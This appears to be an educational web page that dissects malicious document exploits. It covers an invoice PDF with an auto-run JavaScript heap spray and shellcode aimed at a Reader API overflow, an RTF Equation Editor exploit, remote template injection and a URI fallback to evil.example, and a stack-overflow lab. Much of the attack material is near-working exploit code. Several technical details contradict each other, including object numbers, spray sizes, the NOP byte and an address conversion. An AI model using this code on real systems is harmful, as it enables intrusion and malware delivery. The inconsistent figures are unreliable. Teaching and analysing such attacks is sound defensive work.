↑ Byte offset where the xref table starts in this file. %%EOF ↑ End of file marker. Nothing after this in a clean PDF.

6 objects | 0 actions | 0 scripts SAFE ✓

💀 Invoice_March_2024.pdf (6.8 KB) Exploited

───── PDF HEADER (identical to clean) ───── %PDF-1.7 %âãÏÓ ───── OBJECT 1: CATALOG — ⚠ MODIFIED ───── 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 7 0 R ⚠ INJECTED! This line does NOT exist in the clean PDF. ⚠ /OpenAction tells the reader: "when this PDF opens, ⚠ automatically execute the action in Object 7." ⚠ The user is never asked for permission. >> endobj ───── OBJECTS 2–6: IDENTICAL TO CLEAN PDF ───── 2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj 3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R /Resources << /Font << /F1 5 0 R /F2 6 0 R >> >> >> endobj 4 0 obj << /Length 412 >> stream BT /F2 22 Tf 72 740 Td (INVOICE) Tj /F1 11 Tf 0 -24 Td (Invoice #2024-0342) Tj 0 -16 Td (Date: March 15, 2024) Tj 0 -16 Td (Bill To: Acme Corporation) Tj 0 -16 Td (Attn: Jane Doe, Accounts Payable) Tj 0 -32 Td /F2 11 Tf (Description Qty Rate Amount) Tj /F1 10 Tf 0 -18 Td (Consulting Services 40 $85.00 $3,400.00) Tj 0 -14 Td (Software License 1 $650.00 $650.00) Tj 0 -14 Td (Support Package 1 $200.00 $200.00) Tj 0 -24 Td /F2 11 Tf (TOTAL DUE: $4,250.00) Tj 0 -32 Td /F1 9 Tf (Payment Terms: Net 30) Tj 0 -14 Td (Please remit to: Acme Corp, PO Box 1234) Tj ET endstream endobj ↑ Page content is 100% identical to clean — the invoice looks normal. 5 0 obj << /Type /Font /Subtype /Type1 /BaseFont /Helvetica >> endobj 6 0 obj << /Type /Font /Subtype /Type1 /BaseFont /Helvetica-Bold >> endobj ═══════════════════════════════════════════════ ⚠ EVERYTHING BELOW THIS POINT IS NEW — ⚠ INJECTED BY THE ATTACKER. The clean PDF ⚠ ends at Object 6. Objects 7, 8, 9 are ⚠ the attacker's malicious additions. ═══════════════════════════════════════════════ ───── OBJECT 7: AUTO-OPEN TRIGGER ───── 7 0 obj << /Type /Action ⚠ This is an Action object — it DOES something when invoked. /S /JavaScript ⚠ /S /JavaScript = the action type is "execute JavaScript". ⚠ Adobe Reader has a built-in JavaScript engine. /JS 9 0 R ⚠ The actual JavaScript code is in Object 9 (a stream). >> endobj ───── OBJECT 8: SECONDARY ACTION (backup trigger) ───── 8 0 obj << /Type /Action /S /JavaScript /JS 9 0 R /Next 7 0 R ⚠ /Next chains to Object 7 — redundant trigger for reliability. ⚠ If one action fails, the other still fires. >> endobj ───── OBJECT 9: THE PAYLOAD (compressed JavaScript) ───── 9 0 obj << /Length 4821 ⚠ 4,821 bytes — WAY larger than any normal PDF object. ⚠ A clean PDF font object is ~60 bytes. This is suspicious. /Filter /FlateDecode ⚠ /FlateDecode = zlib compression. The bytes below are ⚠ compressed. When Reader opens this object, it decompress- ⚠ es them to reveal ~11,200 bytes of raw JavaScript code. ⚠ This compression HIDES the payload from simple text search. >> stream 78 9C 4D 52 CB 6E DB 30 ⚠ 78 9C = zlib magic header (confirms FlateDecode). 10 BC F7 2B 76 49 0F 49 C5 A4 F8 10 29 41 81 A2 40 DB 97 FC 8E 3C 0A 17 E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F2 52 57 8B 52 10 8B 4A 3C 8B 4C 11 78 E3 48 01 D1 51 8B 59 20 01 D3 8B 49 18 E3 3A 49 8B 34 8B 01 D6 31 FF AC C1 ⚠ These compressed bytes, when decoded, become: ⚠ • Shellcode encoded as unescape("%ue8fc%u8200...") ⚠ • A heap spray loop filling 200MB with NOP sleds ⚠ • A call to Collab.collectEmailInfo() to trigger overflow CF 0D 01 C7 38 E0 75 F6 03 7D F8 3B 7D 24 75 E4 58 8B 58 24 01 D3 66 8B 0C 4B 8B 58 1C 01 D3 8B ⚠ ... 4,700+ more bytes of compressed exploit code ... 04 8B 01 D0 89 44 24 24 5B 5B 61 59 5A 51 FF E0 5F 5F 5A 8B 12 EB 8D 5D endstream endobj ───── MODIFIED CROSS-REFERENCE TABLE ───── xref 0 10 ⚠ Changed from "0 7" to "0 10" — now indexes 10 objects ⚠ instead of 7 (added objects 7, 8, 9). 0000000000 65535 f 0000000015 00000 n 0000000089 00000 n 0000000164 00000 n 0000000398 00000 n 0000000862 00000 n 0000000939 00000 n 0000001022 00000 n 0000001118 00000 n 0000001230 00000 n ⚠ Three new entries added pointing to objects 7, 8, 9. ───── MODIFIED TRAILER ───── trailer << /Size 10 ⚠ Changed from 7 to 10 to account for 3 new objects. /Root 1 0 R >> startxref 6104 ⚠ Changed from 1022 — xref table is now at a different ⚠ byte offset because extra objects pushed it further back. %%EOF

9 objects | 2 actions | 1 JS stream ⚠ MALICIOUS

👁️ What Changed — Summary The attacker made exactly 4 modifications to the clean PDF:
1. Added /OpenAction 7 0 R to Object 1 (the Catalog) — this is the auto-execute trigger.
2. Added Object 7 — a JavaScript action that references the payload stream.
3. Added Object 8 — a backup action with /Next chaining for reliability.
4. Added Object 9 — 4,821 bytes of FlateDecode-compressed JavaScript containing shellcode + heap spray + vulnerability trigger.
The xref table and trailer were updated to reflect the new objects. The visible invoice content is completely unchanged — the user sees nothing different when they open the file.

How Each Exploit Type Works Internally

Different document formats are exploited in fundamentally different ways. Use the tabs below to explore each technique:

PDF JavaScript Execution

The PDF specification (ISO 32000) officially supports JavaScript. Adobe Reader includes a full SpiderMonkey JS engine (the same engine Firefox uses). This means a PDF file can contain complete JavaScript programs that execute automatically. Attackers abuse this to:

Run code automatically when the PDF opens (/OpenAction) — no user interaction required
Trigger on page navigation (/AA /O), form submission (/AA /K), print events (/AA /WP), or even document close
Access Reader's internal APIs like Collab.collectEmailInfo(), util.printf(), spell.customDictionaryOpen() — many of which have had buffer overflow vulnerabilities
Build heap sprays using JavaScript's string manipulation (create strings of NOP sled bytes, replicate them across ~200MB of heap memory)
Fingerprint the Reader version using app.viewerVersion and serve version-specific exploits

Here's what the decoded JavaScript inside a malicious PDF actually looks like — this is extracted from Object 8's compressed stream after running it through a FlateDecode decompressor (tools like pdf-parser.py -f 8 do this automatically):

decoded_payload.js — extracted from obj 8 (after FlateDecode)

// DECODED from the FlateDecode stream — this is what runs
// when the PDF opens in a vulnerable Adobe Reader

var shellcode = unescape(
  "%u4141%u4141%u4242%u4242" + // NOP sled (encoded as Unicode)
  "%ue8fc%u0082%u0000%u8960" + // Shellcode start
  "%ue531%u64f0%u508b%u8b30" + // PEB walk to find kernel32
  "%u0c52%u528b%u8b14%u2872" + // Locate LoadLibraryA
  "%u18b1%u50ff%u3368%u6832" + // Resolve API addresses
  // ... hundreds more bytes ...
);

// HEAP SPRAY — fill memory with shellcode copies
var spray = new Array();
var chunk = "";

// Build a 1MB block: NOP sled + shellcode
var nopsled = unescape("%u0c0c%u0c0c");
while (nopsled.length < 0x100000) {
  nopsled += nopsled;
}
chunk = nopsled.substring(0, 0x100000 - shellcode.length);

// Spray 200 copies across the heap (~200 MB)
for (var i = 0; i < 200; i++) {
  spray[i] = chunk + shellcode;
}

// TRIGGER — exploit vulnerability in Collab.collectEmailInfo()
// Buffer overflow overwrites saved EIP → lands in NOP sled
Collab.collectEmailInfo({subj: "A".repeat(0x4141)});

⚠ What Just Happened The JavaScript: (1) decoded shellcode from hex/unicode, (2) sprayed 200MB of NOP-sled + shellcode across the heap, (3) triggered a buffer overflow in a Reader API. The overflow redirects execution into the sprayed memory → lands on a NOP sled → slides into shellcode → full code execution.

Heap Spraying — Filling Memory with Malice

Heap spraying is a memory manipulation technique that makes exploit reliability dramatically higher. The core problem for an attacker is: after the buffer overflow hijacks EIP, the CPU needs to jump somewhere — but the attacker doesn't know the exact address where their shellcode landed in memory. ASLR (Address Space Layout Randomization) makes heap addresses unpredictable.

The solution: Instead of needing to guess one exact address, the attacker fills hundreds of megabytes of heap memory with copies of the shellcode, each preceded by a huge NOP sled. Now any jump into that region (a ~200MB window) will land on either a NOP sled (which slides to the shellcode) or the shellcode itself. This turns a needle-in-a-haystack problem into a barn-door problem. The spray creates ~200 identical 1MB blocks, each containing ~1,048,232 bytes of NOP sled followed by ~344 bytes of shellcode.

Before the Spray — Normal Memory Layout

0x00400000

AcroRd32.exe code

0x00800000

Heap (small, normal)

0x01000000

Free / unmapped

0x7FFE0000

Kernel32/NTDLL

After the Spray — Attacker Controls the Heap

0x00400000

AcroRd32.exe code

0x04040000

NOP sled (0x0c0c0c0c)

0x0c0c0c0c

Spray block #48 (target!)

0x0c0c0c0c+

★ Shellcode lands here

0x0c100000

Spray blocks #49-200...

0x7FFE0000

Kernel32/NTDLL

🎯 Why 0x0c0c0c0c? Attackers use the value 0x0c0c0c0c because: (1) it's a predictable address in the heap region after spraying ~200MB, (2) 0x0C is the opcode for a benign instruction (OR AL, imm8) on x86 — so even if execution lands in the middle of the NOP sled, it slides harmlessly to the shellcode.

The hex dump below shows what a single spray block looks like in memory — the repeating NOP sled pattern followed by the actual shellcode:

0C0C0000 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ 0C0C0010 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ 0C0C0020 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ ... ◄ thousands of rows — all 0x0C (NOP sled) ► 0C0CFFF0 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ 0C0D0000 FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B ......`.1.d.P0. 0C0D0010 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C R..R..r(..J&1..< 0C0D0020 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F2 52 57 8B 52 a|., .......RW.R 0C0D0030 10 8B 4A 3C 8B 4C 11 78 E3 48 01 D1 51 8B 59 20 ..J<.L.x.H..Q.Y ... ◄ shellcode continues — downloads & executes payload ►

RTF (Rich Text Format) Exploits

RTF files are text-based documents parsed by Microsoft Word. Unlike .docx (which is a ZIP of XML files), RTF uses control words (like {\rtf1\ansi}) that Word's parser interprets directly. RTF supports embedded OLE objects via the {\object\objemb} control — which means an attacker can embed a binary exploit payload inside what looks like a plain text document.

Why attackers love RTF: (1) RTF files are parsed by Word's preview pane — the exploit can trigger just by selecting the file in Windows Explorer. (2) The binary payload is hex-encoded in the \objdata field, making it easy to generate with Python. (3) RTF doesn't trigger the Mark-of-the-Web check in some Office configurations. (4) Many email gateways don't inspect RTF as aggressively as .docx or .xlsx.

The example below shows a complete malicious RTF — it displays a normal invoice while hiding an Equation Editor exploit (CVE-2017-11882) in the embedded OLE object. The hex bytes in the \objdata field are the actual binary content of the exploit payload:

malicious_invoice.rtf — raw view

{\rtf1\ansi\deff0
{\fonttbl{\f0 Calibri;}}
\pard Invoice #2024-0342 — Acme Corp\par
\pard Total Due: $4,250.00\par

{\* This part looks normal to the reader}

{\object\objemb\objw1\objh1    ◄ EMBEDDED OLE OBJECT
{\*\objclass Equation.3}      ◄ Targets Equation Editor
{\*\objdata
01050000                       ◄ OLE header
02000000                       ◄ Format ID
0B0000004571756174696F6E    ◄ "Equation" in hex
2E33000000000000000000
0000000000
1C00000002000000E9FF        ◄ Overflow starts here
BF0000000000                 ◄ Overwrites return addr
41414141                       ◄ 0x41414141 = "AAAA"
FC E8 82 00 00 00 60 89    ◄ Shellcode begins
E5 31 C0 64 8B 50 30 8B    ◄ PEB walk...
... more shellcode bytes ...
}}
}

🔍 The RTF Trick The document displays a normal invoice. But hidden inside is an OLE object targeting the Equation Editor (CVE-2017-11882). The hex-encoded binary overflows a buffer in EQNEDT32.EXE, overwrites the return address, and redirects execution to embedded shellcode. Word renders the invoice — the user sees nothing wrong.

OLE Object Embedding

OLE (Object Linking and Embedding) is a Microsoft technology that lets documents contain other documents or executable content. A Word document can embed an Excel spreadsheet, a Visio diagram, a PDF, an Equation Editor object, or even a packaged executable disguised with a custom icon. When the user double-clicks the embedded object, the associated handler application launches and processes it — and that processing is where vulnerabilities live.

How it works internally: A .docx file is actually a ZIP archive. Inside it, the word/document.xml file references embedded objects by relationship ID (e.g., r:id="rId8"). The relationship file (word/_rels/document.xml.rels) maps that ID to an embedded file (e.g., word/embeddings/oleObject1.bin). That .bin file contains the OLE structured storage with the actual exploit payload — it could be an Equation Editor exploit, a Flash SWF, an ActiveX control, or a packaged .exe with a fake PDF icon. When Word processes this document, it reads the ProgID attribute to determine which COM server to launch for the object — and that server is the vulnerable target.

document.xml — inside .docx (unzipped)

<!-- .docx files are ZIP archives containing XML -->
<!-- This is from word/document.xml -->

<w:body>
  <w:p><w:r><w:t>Please review the attached report.</w:t></w:r></w:p>

  <!-- Normal paragraph above, but then... -->

  <w:p>
    <w:r>
      <w:object>
        <o:OLEObject
          Type="Embed"
          ProgID="Package"
          ShapeID="_x0000_i1025"
          DrawAspect="Icon"
          ObjectID="_1234567890"
          r:id="rId8" />          ◄ Embedded object
      </w:object>
    </w:r>
  </w:p>
</w:body>

<!-- The relationship file (word/_rels/document.xml.rels) maps rId8 -->
<!-- to an embedded object in word/embeddings/oleObject1.bin -->
<!-- That .bin can contain: -->
<!--   • An Equation Editor exploit (CVE-2017-11882) -->
<!--   • A Flash SWF exploit -->
<!--   • An ActiveX control that downloads malware -->
<!--   • A packaged .exe disguised as a PDF icon -->

For remote template injection, instead of embedding the payload directly, the attacker uses an external relationship:

word/_rels/document.xml.rels — remote template

<Relationships>
  <Relationship Id="rId1" Type="...normal-template..." 
    Target="file:///Normal.dotm" />

  <Relationship Id="rId8"
    Type="...attachedTemplate..."
    Target="https://evil.example/template.dotm"
    TargetMode="External" />     ◄ Fetches from attacker server!
</Relationships>

<!-- When Word opens this document, it automatically -->
<!-- fetches template.dotm from the attacker's server. -->
<!-- The template contains the actual macro/exploit. -->
<!-- The original .docx file is CLEAN — no detections! -->

🧩 Why This Evades Detection The .docx itself contains no malicious code — just a URL. Antivirus scans the file and finds nothing. Only when Word opens it and fetches the remote template does the exploit load. By then, the static scan has already passed.

PDF Exploit Lifecycle — From Open to Owned

When a victim opens a weaponized PDF, the following chain of events fires automatically. Each phase takes milliseconds. The entire sequence — from file open to full code execution — completes in under 2 seconds. The user sees a normal invoice on screen the entire time.

📂 PDF Opens +0.0s

Reader parses all objects starting from the trailer, finds the Catalog (Object 1), builds the page tree, and loads fonts and content streams. The invoice renders on screen — everything looks normal. The user has no idea that the Catalog contains a hidden trigger.

⚡ /OpenAction Fires +0.1s

Reader finds /OpenAction 7 0 R in the Catalog. This tells Reader: "before displaying anything, execute the action in Object 7." Object 7 is a JavaScript action that references a compressed payload stream. No click required — the PDF specification explicitly allows this for "convenience features" like auto-print.

🧱 Heap Spray +0.3s

Reader decompresses Object 9 (/FlateDecode) and executes the JavaScript inside. The script decodes shellcode from hex/unicode encoding, then allocates 200 JavaScript string objects, each ~1MB, filling ~200MB of heap memory with NOP-sled + shellcode copies. The heap is now a minefield: almost any address the CPU jumps to will land on attacker-controlled data.

💥 Vulnerability Trigger +0.8s

The JavaScript calls Collab.collectEmailInfo({subj: "A".repeat(0x4141)}). This Reader API has a stack buffer overflow — the oversized subject string (16,705 bytes) overwrites past the 256-byte buffer boundary, corrupting the saved frame pointer (EBP) and the return address (EIP) on the stack.

🎯 EIP Hijack +1.0s

The attacker overwrites EIP with 0x0C0C0C0C — an address inside the sprayed heap region. When the vulnerable function executes ret, the CPU jumps to 0x0C0C0C0C. Because the heap is filled with NOP-sled + shellcode, the CPU lands on a NOP (0x90), slides forward through the NOP sled, and hits the shellcode. The attacker now controls execution.

💀 Shellcode Execution +1.8s

The shellcode executes inside the AcroRd32.exe process. It walks the PEB (Process Environment Block) to find kernel32.dll, resolves LoadLibraryA and GetProcAddress via ROR-13 hash, then calls URLDownloadToFileA to download a Cobalt Strike beacon from the attacker's C2 server. The beacon installs as a service and phones home. Full compromise — in under 2 seconds.

⚠ The User Experience vs. What Actually Happened What the user saw: Opened an email attachment. An invoice appeared in Adobe Reader showing "INVOICE #2024-0342 — Acme Corp — Total Due: $4,250.00." Nothing unusual. They closed the file and went back to work.

What actually happened: In 1.8 seconds: Reader parsed the Catalog → found /OpenAction → decompressed 4,821 bytes of JavaScript → the script decoded shellcode from hex → sprayed 200MB of heap with NOP+shellcode → called Collab.collectEmailInfo with a 16,705-byte string → buffer overflow overwrote EIP with 0x0C0C0C0C → CPU jumped to sprayed heap → NOP sled → shellcode walked PEB → resolved kernel32 APIs → downloaded beacon.exe → Cobalt Strike C2 channel established. The attacker now has a persistent foothold inside the corporate network.

The Complete Weaponized PDF — Annotated Line by Line

Below is the complete source code of a weaponized PDF file with every single object annotated. The 8 numbered comments reveal exactly where the attacker planted each trap. A legitimate PDF only needs Objects 1-6. Objects 7, 8, and 9 are the weapons the attacker added.

invoice_2024.pdf — complete annotated source (malicious)

%PDF-1.4

/* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ① THE TRAP DOOR (/OpenAction)
   This is Object 1 — the Catalog — the root
   of the entire PDF. It looks normal except
   for ONE added line: /OpenAction 7 0 R
   This tells the reader: "When you open this
   file, IMMEDIATELY execute whatever Object 7
   says to do." The user never sees this happen.
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */

1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R              ← normal: points to the page tree
  /OpenAction 7 0 R         ← ★ THE TRAP: auto-execute Object 7 on file open
>>
endobj

/* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ② THE VISIBLE PAGES (Objects 2-6)
   These are 100% legitimate. They define the
   invoice the user sees on screen — fonts,
   layout, text content. Nothing suspicious.
   They exist solely to make the file look real.
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */

2 0 obj
<<
  /Type /Pages
  /Kids [3 0 R]
  /Count 1
>>
endobj

3 0 obj
<<
  /Type /Page
  /Parent 2 0 R
  /MediaBox [0 0 612 792]   ← US Letter size (612×792 points)
  /Contents 4 0 R
  /Resources << /Font << /F1 5 0 R >> >>
>>
endobj

4 0 obj                              ← page content stream (the visible invoice text)
<< /Length 342 >>
stream
BT
/F1 16 Tf 50 750 Td (INVOICE #2024-0342) Tj
/F1 10 Tf 50 720 Td (Acme Corp) Tj
50 700 Td (Total Due: $4,250.00) Tj
ET
endstream
endobj

5 0 obj                              ← font definition
<<
  /Type /Font
  /Subtype /Type1
  /BaseFont /Helvetica
>>
endobj

6 0 obj                              ← font descriptor (optional)
<<
  /Type /FontDescriptor
  /FontName /Helvetica
>>
endobj

/* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ③ THE WEAPON (Object 7 — JavaScript Action)
   This is what /OpenAction points to.
   It tells the reader: "Run this JavaScript."
   The /JS key contains the actual code, and
   /Next chains to Object 8 for reliability
   (if Object 7 fails, try Object 8 instead).
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */

7 0 obj
<<
  /Type /Action
  /S /JavaScript             ← action type: execute JavaScript
  /JS 9 0 R                  ← the JavaScript code is in Object 9 (compressed)
  /Next 8 0 R                ← backup: if this fails, try Object 8 next
>>
endobj

/* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ④ THE EMBEDDED URL (Object 8 — Backup Action)
   A fallback action that launches a URI if the
   JavaScript route fails. Some PDF readers
   block JS but still allow URI actions.
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */

8 0 obj
<<
  /Type /Action
  /S /URI
  /URI (https://evil.example/stage2.exe)   ← direct download fallback
>>
endobj

/* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ⑤ THE SHELLCODE + ⑥ NOP SLED + ⑦ HEAP SPRAY
   Object 9 is the compressed JavaScript stream.
   When decompressed (FlateDecode), it reveals
   the full exploit payload: shellcode definition,
   NOP sled generation, heap spray execution,
   and the vulnerability trigger function call.
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */

9 0 obj
<<
  /Length 4821
  /Filter /FlateDecode       ← compressed! Use pdf-parser to decompress
>>
stream
[...4,821 bytes of zlib-compressed JavaScript...
 When decompressed, this becomes the heap spray + trigger
 code shown in the "JS Heap Spray" section below         ]
endstream
endobj

/* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ⑧ THE TRIGGER (xref + trailer)
   The cross-reference table tells the reader
   where each object starts (byte offsets).
   The trailer points to the Catalog (Object 1)
   which starts the entire chain:
   Trailer → Catalog → /OpenAction → Object 7
   → JavaScript → Object 9 → Heap Spray →
   Trigger Overflow → EIP Hijack → Shellcode
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */

xref
0 10
0000000000 65535 f       ← Object 0 (free — always present)
0000000009 00000 n       ← Object 1 at byte 9 (Catalog + trap)
0000000115 00000 n       ← Object 2 at byte 115 (Pages)
0000000169 00000 n       ← Object 3 at byte 169 (Page)
0000000330 00000 n       ← Object 4 at byte 330 (visible content)
0000000721 00000 n       ← Object 5 at byte 721 (font)
0000000805 00000 n       ← Object 6 at byte 805 (font descriptor)
0000000889 00000 n       ← Object 7 at byte 889 (★ JS Action)
0000001052 00000 n       ← Object 8 at byte 1052 (★ URI fallback)
0000001188 00000 n       ← Object 9 at byte 1188 (★ compressed payload)

trailer
<<
  /Size 10
  /Root 1 0 R                ← Start here → Catalog → /OpenAction → BOOM
>>
startxref
6009                         ← byte offset of the xref table itself
%%EOF

📊 The Object Map Summary

Legitimate: Objects 1-6 (Catalog, Pages, Page, Content, Font, FontDescriptor) — these render the invoice
Malicious: Object 7 (JS Action), Object 8 (URI Fallback), Object 9 (Compressed Payload) — these run the exploit
The Connection: One line in Object 1 (/OpenAction 7 0 R) bridges the gap between "document" and "weapon"

The JavaScript Heap Spray — Step by Step

This is what's hiding inside Object 9 after decompression. Each of the 8 steps is annotated to show exactly what the JavaScript does, why it does it, and the math behind each operation.

decoded_object9.js — the decompressed heap spray payload (8 steps)

// ═══════════════════════════════════════════════════
// STEP ① — THE SHELLCODE (the actual weapon)
// This is raw machine code encoded as a JavaScript
// string using %u (unicode escape) format.
// When decoded: FC E8 82 00 00 00 60 89 E5 31 C0...
// This code downloads & executes a remote payload.
// ═══════════════════════════════════════════════════

var shellcode = unescape(
    "%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30" +
    "%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac" +
    "%u7c61%u2c02%ucf20%u0dc1%uc701%uf2e2%u5752%u528b" +
    "%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059"
    /* ... ~340 bytes total when decoded ... */
);

// MATH: Each %uXXYY = 2 bytes. The string has ~170
// %u sequences → 170 × 2 = 340 bytes of machine code.
// In memory: FC E8 82 00 00 00 60 89 E5 31 C0 64...

// ═══════════════════════════════════════════════════
// STEP ② — THE NOP SLED (the landing zone)
// 0x0C = the NOP-equivalent byte. As a %u escape,
// two 0x0C bytes = %u0c0c. This creates a tiny seed
// string of NOP bytes that we'll exponentially grow.
// ═══════════════════════════════════════════════════

var junk_code = unescape("%u0c0c%u0c0c");

// Result: 4 bytes → 0C 0C 0C 0C
// This is the "seed" — we double it until it's huge.

// ═══════════════════════════════════════════════════
// STEP ③ — NOP SLED EXPANSION (exponential doubling)
// We double the NOP string in a loop until it reaches
// 0x40000 (262,144) bytes. This takes only ~16 loops
// because 4 × 2^16 = 262,144. Exponential growth!
// ═══════════════════════════════════════════════════

while (junk_code.length < 0x40000) {
    junk_code += junk_code;   // double the string each iteration
}
// Loop trace:
//   Start:  4 bytes
//   Loop 1: 8 bytes        (4+4)
//   Loop 2: 16 bytes       (8+8)
//   Loop 3: 32 bytes       (16+16)
//   ...     (doubles each iteration)
//   Loop 16: 262,144 bytes (0x40000) → STOP
// Total: 262,144 bytes = 256 KB of 0C 0C 0C 0C...

// ═══════════════════════════════════════════════════
// STEP ④ — ASSEMBLING THE SPRAY BLOCK
// Each block = NOP sled (from step 3) + shellcode.
// We trim the NOP sled so the total = exactly 1MB.
// Block structure: [0C0C0C...×1MB-340B] [shellcode]
// ═══════════════════════════════════════════════════

var spray_block = junk_code.substring(0, 0x40000 - shellcode.length);

// MATH: 0x40000 = 262,144 bytes
// 262,144 - 340 (shellcode) = 261,804 bytes of NOP sled
// NOP % = 261,804 / 262,144 = 99.87% landing zone!

spray_block += shellcode;   // append the weapon at the end

// Result: [0C 0C 0C 0C ... × 261,804 bytes ...] [FC E8 82 00 ...]
//          ← NOP sled (safe landing zone) →     ← shellcode →

// ═══════════════════════════════════════════════════
// STEP ⑤ — SPRAYING THE HEAP (filling memory)
// We create 200 copies of the spray block in a JS
// array. Each copy gets its own heap allocation.
// 200 × 262,144 = 52,428,800 bytes ≈ 50MB minimum
// (JS string overhead pushes actual usage to ~200MB)
// ═══════════════════════════════════════════════════

var spray_array = new Array();
for (var i = 0; i < 200; i++) {
    spray_array[i] = spray_block.substring(0, spray_block.length);
}

// Each spray_array[i] holds a unique copy of the spray block.
// .substring(0, length) forces a NEW string allocation each time
// (prevents JS engine from just sharing a reference).
//
// After this loop, the process heap looks like:
// [block 0][block 1][block 2]...[block 199]
// Each block = 256KB of NOP+shellcode
// Total sprayed = 200 × 256KB = ~50MB of raw data
// With JS overhead: ~200MB of heap consumed

// ═══════════════════════════════════════════════════
// STEP ⑥ — THE TARGET ADDRESS CHECK
// Address 0x0C0C0C0C = 201,326,592 decimal
// = ~192MB into the virtual address space.
// Our spray covers addresses from ~50MB to ~250MB.
// 192MB falls right in the middle → guaranteed hit!
// ═══════════════════════════════════════════════════

// ═══════════════════════════════════════════════════
// STEP ⑦ — TRIGGER THE VULNERABILITY
// Now we call a VULNERABLE Adobe Reader API with
// a string that's way too long. This overflows an
// internal buffer and overwrites EIP with 0x0C0C0C0C
// (which is inside our sprayed heap region).
// ═══════════════════════════════════════════════════

var evil_string = "";
for (var j = 0; j < 16705; j++) {
    evil_string += unescape("%u0c0c%u0c0c");   // fill with target address
}
// evil_string = 16,705 × 4 = 66,820 bytes of "0C 0C 0C 0C"
// This is WAY more than the internal buffer can hold.
// The overflow writes 0x0C0C0C0C over saved EIP on the stack.

Collab.collectEmailInfo({subj: evil_string});

// ═══════════════════════════════════════════════════
// STEP ⑧ — WHAT HAPPENS NEXT (automatic)
// 1. collectEmailInfo's internal buffer overflows
// 2. Saved EIP on stack → overwritten with 0x0C0C0C0C
// 3. Function returns → CPU jumps to 0x0C0C0C0C
// 4. Address 0x0C0C0C0C is inside our sprayed heap!
// 5. CPU executes NOP sled (0C 0C 0C 0C...)
// 6. NOP sled slides to shellcode
// 7. Shellcode: downloads and runs attacker's payload
// 8. Game over — attacker has code execution
// ═══════════════════════════════════════════════════

🔗 Connecting the Dots

The PDF file (annotated above) contains Object 9 with 4,821 bytes of compressed data. When Adobe Reader decompresses it, the JavaScript code above is what executes. Steps ①-⑤ prepare the heap, Step ⑦ triggers the overflow, and Step ⑧ happens automatically. The entire process takes under 2 seconds. The user sees nothing but an invoice.

🔬 Exploit Workshop — Build Every Component Step by Step

Four interactive labs. Each one lets you type real values and watch them appear in the exploit code — showing exactly how each component is built. Left side = safe/normal, right side = exploited. Everything is static text rendered in your browser. Nothing executes. Nothing touches your PC.

Buffer Overflow is the foundation of nearly all memory corruption exploits. A program allocates a fixed-size buffer on the stack, but copies user input without checking length. The attacker sends more data than the buffer can hold — overwriting the saved return address (EIP) with a pointer to their shellcode. When the function returns, the CPU jumps to the attacker's code instead of back to the caller. Below: the vulnerable C code on the left, the generated exploit payload + stack visualization on the right. Change the values and watch everything update live.

Buffer Size (bytes)

Return Addr (hex)

NOP Sled Byte

Payload Text

✅ VULNERABLE C CODE (the target program)

#include <stdio.h>
#include <string.h>

// THE GOAL: Attacker wants to force
// the CPU to run this function.
// In reality = shellcode download.
void download_malware() {
    printf("COMPROMISED!\n");
}

// THE VULNERABLE FUNCTION
void parse_document(char *data) {
    char title_buffer[64];

    // ⚠ THE VULNERABILITY:
    // No length check before copy!
    strcpy(title_buffer, data);
    // strcpy copies until \0 — if data
    // is longer than 64, it overflows
    // into the stack frame above.

    printf("Title: %s\n", title_buffer);
}

int main(int argc, char *argv[]) {
    // App receives "document" data
    parse_document(argv[1]);
    return 0;
}

// Normal input:  "Quarterly Report"
//   → fits in 64 bytes, no overflow
//
// Attacker input: 64 bytes of junk
//   + 4 bytes (saved EBP)
//   + 4 bytes (return address → shellcode)
//   + NOP sled + shellcode
//
// When parse_document returns, EIP is
// hijacked → CPU runs shellcode.

💀 CRAFTED EXPLOIT INPUT (what attacker sends)

📊 Stack Memory — Before vs After Overflow

BEFORE (normal input "Quarterly Report")

AFTER (attacker's crafted input)

What just happened? The attacker sent 72 bytes. The first 64 bytes ("A"s) fill the buffer. The next 4 bytes overwrite the saved EBP (frame pointer). The next 4 bytes (0x0c0c0c0c) overwrite the return address — when parse_document() executes ret, the CPU jumps to 0x0c0c0c0c instead of returning to main(). That address points to the NOP sled in the heap-sprayed memory, which slides into the shellcode. Game over.

